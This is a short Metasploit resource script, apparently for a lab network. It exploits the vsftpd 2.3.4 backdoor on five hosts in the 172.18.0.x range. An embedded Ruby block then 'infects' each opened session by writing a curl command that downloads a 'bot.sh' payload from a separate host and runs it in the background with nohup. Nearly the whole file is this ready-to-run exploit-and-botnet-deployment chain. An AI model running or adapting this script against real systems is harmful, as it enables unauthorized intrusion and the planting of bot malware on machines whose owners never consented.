use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 172.18.0.3
exploit -z
set RHOSTS 172.18.0.4
exploit -z
set RHOSTS 172.18.0.5
exploit -z
set RHOSTS 172.18.0.6
exploit -z
set RHOSTS 172.18.0.7
exploit -z

sleep 3

# Deploy payload to each session using Ruby
<ruby>
print_status("Deploying payloads to #{framework.sessions.length} sessions...")
framework.sessions.each do |sid, session|
  print_status("Infecting session #{sid}...")
  cmd = "curl -s http://172.18.0.2:9000/payload -o /tmp/bot.sh && chmod +x /tmp/bot.sh && nohup /tmp/bot.sh >/tmp/bot.log 2>&1 &\n"
  session.shell_write(cmd)
  sleep(1)
  print_good("Session #{sid} infected")
end
print_good("All sessions infected!")
</ruby>
